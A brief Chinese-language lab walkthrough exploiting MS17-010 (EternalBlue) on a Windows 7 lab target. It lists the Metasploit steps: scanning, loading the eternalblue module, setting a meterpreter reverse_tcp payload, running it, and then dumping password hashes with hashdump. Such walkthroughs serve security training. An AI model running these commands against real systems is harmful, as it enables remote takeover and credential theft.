MS17-010远程溢出(CVE-2017-0143)
2021-05-25 15:16:47
MS17-010远程溢出(CVE-2017-0143)
靶机:win7 ip:192.168.200.101
攻击机:kali ip:192.168.200.10
首先进行扫描:
1 | nmap -sV -Pn 192.168.200.101 |
也可以在msf里进行扫描(msfconsole 进入msf)
可以看到效果(没有也不用急)
打开 metasploite 命令行客户端,使用search命令查找ms17-010漏洞的相关模块
1 | search ms17-010 |
由于这是靶场所以我们直接利用
1 | use exploit/windows/smb/ms17_010_eternalblue |
此时我们查看一下
1 | show option |
发现受害机(RHOSTS)不是目标机器
所以我们进行更改
1 | set RHOSTS 192.168.200.101 |
此时再查看一下就是了
之后,选择载荷payload,也就是shellcode,此处我们选择回连至控制端shell的payload
1 | set payload windows/x64/meterpreter/reverse_tcp |
完成配置后,运行exploit或者run,开始执行漏洞利用模块
1 | run |
此时我们执行
1 | sysinfo |
接下来,我们获取目标机hash值
执行hashdump
1 | hashdump |
